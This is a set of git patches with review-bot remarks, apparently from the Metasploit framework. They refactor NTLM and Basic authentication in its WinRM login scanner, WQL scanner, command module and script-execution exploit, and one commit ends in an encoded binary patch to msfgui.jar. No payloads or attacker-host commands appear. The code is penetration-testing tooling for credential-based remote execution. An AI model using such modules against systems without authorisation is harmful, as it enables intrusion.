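Review bot: In `winrm_run_cmd` and `winrm_run_cmd_hanging` only the open-shell response is checked for `nil`; the results of the later `send_winrm_request` calls go straight into `winrm_get_cmd_id(resp)` and `winrm_get_cmd_streams(resp)`, so a timeout part-way through would pass `nil` to those helpers (their nil handling is not visible here). The same pattern appears in `temp_dir` and in `valid_login?` in winrm_script_exec.rb, where `unless resp.code == 200` would raise NoMethodError on a missing reply. A guard after each call, e.g. `return nil if resp.nil?`, and in `valid_login?` `return false if resp.nil? || resp.code != 200`, keeps a dropped connection from surfacing as an exception. In `winrm_run_cmd` any early return after the shell is opened should still send `winrm_delete_shell_msg(shell_id)` so the remote shell is not left behind.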
@@ -219,94 +219,6 @@ def generate_uuid ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = 
c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def accepts_ntlm_auth parse_auth_methods(winrm_poke).include? "Negotiate" end @@ -329,6 +241,18 @@ def wmi_namespace return "/root/cimv2/" end + def send_winrm_request(data, timeout=20) + opts = { + 'uri' => datastore['URI'], + 'method' => 'POST', + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'ctype' => "application/soap+xml;charset=UTF-8" + } + send_request_cgi(opts,timeout) + end + private diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index d8012fb723f9..564e794b2270 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -44,7 +44,7 @@ def run_host(ip) return end each_user_pass do |user, pass| - resp,c = send_request_ntlm(test_request) + resp = send_winrm_request(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index ed09cfd5830e..1588d9d3855b 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -47,7 +47,7 @@ def run_host(ip) return end - resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 666ca66d3dba..62e343a79896 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb 
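Review bot: `send_winrm_request` passes only `username` and `password`, whereas the `send_request_ntlm` it replaces also used `datastore['DOMAIN']` and the `NTLM::*` datastore settings; unless `send_request_cgi` reads those itself (not visible here), domain accounts and non-default NTLM settings would silently stop being honoured. The helper is also undocumented, and since the auth scheme now appears to be chosen from the server's challenge it is worth stating that the password may go out as Basic when the server offers it. Suggested header comment: `# POSTs a SOAP payload to datastore['URI'] with the datastore credentials; the HTTP client picks the auth scheme from the server's challenge.` If the domain is still required, it should be passed through whichever option the HTTP client expects for it.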
@@ -66,20 +66,8 @@ def initialize(info = {}) @compat_mode = false end - def check - unless accepts_ntlm_auth - print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" - return Msf::Exploit::CheckCode::Safe - end - - return Msf::Exploit::CheckCode::Vulnerable - end - - def exploit - unless check == Msf::Exploit::CheckCode::Vulnerable - return - end + unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -141,7 +129,7 @@ def encoded_psh(script) def temp_dir print_status "Grabbing %TEMP%" - resp,c = send_request_ntlm(winrm_open_shell_msg) + resp = send_winrm_request(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -152,16 +140,16 @@ def temp_dir end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) + resp= send_winrm_request(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp,c = send_request_ntlm(winrm_wql_msg(wql)) + resp = send_winrm_request(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) @@ -247,7 +235,7 @@ def powershell2? def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp,c = send_request_ntlm(data) + resp = send_winrm_request(data) unless resp.code == 200 return false end From af6b0615fb306a8f18cc9385b151da8629654986 Mon Sep 17 00:00:00 2001 
From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 16:42:24 -0600 Subject: [PATCH 281/421] fix pipelining winrm is unforgiving of pipelining from non ntlm requests into the challenge response cycle. we must clear our initial tcp session before starting ntlm auth for winrm --- lib/rex/proto/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 9d019ebac86d..c06de1884e38 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -463,7 +463,7 @@ def digest_auth(opts={}) r = request_cgi(opts.merge({ 'uri' => path, 'method' => method })) - resp = _send_recv(r, to, true) + resp = _send_recv(r, to) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -610,7 +610,7 @@ def negotiate_auth(opts={}) # First request to get the challenge opts['headers']['Authorization'] = ntlm_message_1 r = request_cgi(opts) - resp = _send_recv(r, to, true) + resp = _send_recv(r, to) unless resp.kind_of? Rex::Proto::Http::Response return nil end From 877fb017b635f6e4e9653ded428655cbac5a54ac Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 16:50:43 -0600 Subject: [PATCH 282/421] remove negotiate requirements winrm can support basic, and now these modules can too, for free --- lib/msf/core/exploit/winrm.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_login.rb | 4 ---- modules/auxiliary/scanner/winrm/winrm_wql.rb | 5 ----- 4 files changed, 17 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 3eb7fae2ca00..960bff05ce58 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb 
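Review bot: The reason for dropping the third argument from `_send_recv(r, to)` in `digest_auth` and on the first request of `negotiate_auth` is recorded only in the commit message, so in the file the two calls read like an accidental omission that a later cleanup could undo. Assuming the third argument is the keep-connection flag (its definition is not in the hunk), a short comment at both sites would preserve the intent: `# No persist flag: the challenge must be requested on a fresh connection, WinRM rejects a handshake continued on a reused one`. Both methods start and end outside their hunks.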
@@ -219,10 +219,6 @@ def generate_uuid ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def accepts_ntlm_auth - parse_auth_methods(winrm_poke).include? "Negotiate" - end - def target_url proto = "http" if rport == 5986 or datastore['SSL'] diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 12f0c7042250..88e9e717d605 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,10 +40,6 @@ def initialize def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 564e794b2270..946903113efe 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,10 +39,6 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set. def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end each_user_pass do |user, pass| resp = send_winrm_request(test_request) if resp.nil? diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 1588d9d3855b..0c5eeb627414 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,11 +42,6 @@ def initialize def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end - resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" 
From 447f78cb24e82b3e9ceecc03ff24c05b4a46c0bd Mon Sep 17 00:00:00 2001 From: scriptjunkie <scriptjunkie@scriptjunkie.us> Date: Mon, 4 Feb 2013 17:19:54 -0600 Subject: [PATCH 283/421] Handle nonstandard ports when starting new msfrpcd. --- data/gui/msfgui.jar | Bin 800505 -> 799474 bytes .../msfguijava/src/msfgui/RpcConnection.java | 3 ++- 2 files changed, 2 insertions(+), 1 deletion(-) 
diff --git a/data/gui/msfgui.jar b/data/gui/msfgui.jar index 3fc94594f6800e835ef71096f81f3f2411d5c11c..495e0ef2171c0fab4aa20bff970421e09b5352b5 100755 GIT binary patch delta 57073 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 